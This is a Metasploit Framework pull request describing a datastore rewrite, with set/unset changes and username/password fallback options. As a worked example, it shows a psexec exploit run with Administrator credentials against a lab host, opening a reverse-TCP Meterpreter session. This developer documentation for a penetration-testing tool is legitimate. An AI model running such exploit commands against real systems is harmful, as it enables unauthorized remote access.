rapid7/metasploit-framework
# Rewrite datastore, and add support for option fallback lookups

Rewrites the datastore to hopefully fix a lot of quirks and edgecases that we've run into the past, as well as adding support for option fallbacks.

## Supported scenarios/workflows

### unset

If a user has explicitly set a datastore value - it can be unset. This should fix https://github.com/rapid7/metasploit-framework/issues/3811

Before
- The `unset` command would do a mixture of setting values to `nil` and resetting values to their defaults
- `unset rhosts` would delete the local datastore value. Future lookups would return nil, or whatever was present in the global datastore
- `unset all` would import module defaults from scratch again, undoing user defined values
- `unset rhosts` would remove both the value, and the aliases map, which would break setting rhost/rhosts interchangeably in the future

After
- The `unset` command consistently unsets user defined values

### set

An extra flag has been added to `set` to allow setting values to nil. This is useful for removing default word lists, or opting out of using a globally set value.

Example

Showing options with a default word list:

```
msf6 auxiliary(scanner/http/cisco_asa_asdm_bruteforce) > options

Module options (auxiliary/scanner/http/cisco_asa_asdm_bruteforce):

   Name              Current Setting                                                                        Required  Description
   ----              ---------------                                                                        --------  -----------
   ... etc ...
   USER_FILE         /Users/user/Documents/code/metasploit-framework/data/wordlists/http_default_users.txt  no        File containing users, one per line
   ... etc ...
```

Attempting to unset the wordlist, but the default value will continue to be used:
```
msf6 auxiliary(scanner/http/cisco_asa_asdm_bruteforce) > unset user_file
Unsetting user_file...
[!] Variable "user_file" unset - but will use a default value still. If this is not desired, set it to a new value or attempt to clear it with set --clear user_file
```

Explicitly clearing the wordlist:
```
msf6 auxiliary(scanner/http/cisco_asa_asdm_bruteforce) > unset --clear user_file
Unsetting user_file...
```

Option set correctly:

```
msf6 auxiliary(scanner/http/cisco_asa_asdm_bruteforce) > options

Module options (auxiliary/scanner/http/cisco_asa_asdm_bruteforce):

   Name              Current Setting      Required  Description
   ----              ---------------      --------  -----------
   ... etc ... 
   USER_FILE                              no        File containing users, one per line
```

### Option fallback support

Modules often have protocol specific option names such as SMBUser/FTPUser/BIND_DN/etc, whilst a pentester most likely just wants to set `username` consistently across modules.

Registered options now have a `fallbacks` field which be used when evaluating datastore values

```ruby
OptString.new('SMBUser', [ false, 'The username to authenticate as', ''], fallbacks: ['USERNAME']),
OptString.new('SMBPass', [ false, 'The password for the specified username', ''], fallbacks: ['PASSWORD']),
OptString.new('SMBDomain',  [ false, 'The Windows domain to use for authentication', '.'], fallbacks: ['DOMAIN']),
```

Which allows users to consistently set module options with username/password:
```
msf6 exploit(windows/smb/psexec) > run 192.168.123.13  username=Administrator password=p4$$w0rd domain=adf3.local

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] 192.168.123.13:445 - Connecting to the server...
[*] 192.168.123.13:445 - Authenticating to 192.168.123.13:445|adf3.local as user 'Administrator'...
[*] 192.168.123.13:445 - Selecting PowerShell target
[*] 192.168.123.13:445 - Executing the payload...
[+] 192.168.123.13:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to 192.168.123.13
[*] Meterpreter session 3 opened (192.168.123.1:4444 -> 192.168.123.13:50487) at 2022-08-25 11:04:57 +0100

meterpreter >
```

In the scenario of a module having multiple protocols present, the same username/password could be shared across all of the protocols - or the user can set them individually as normal

## Verification steps

Verify that setting the feature works:

```
features set datastore_fallbacks true
save
```

Sanity test that common workflows work as expected for when the feature is enabled, and that nothing is broken when the flag is disabled

- Setting options
- Unsetting options
- Clearing options with --clear
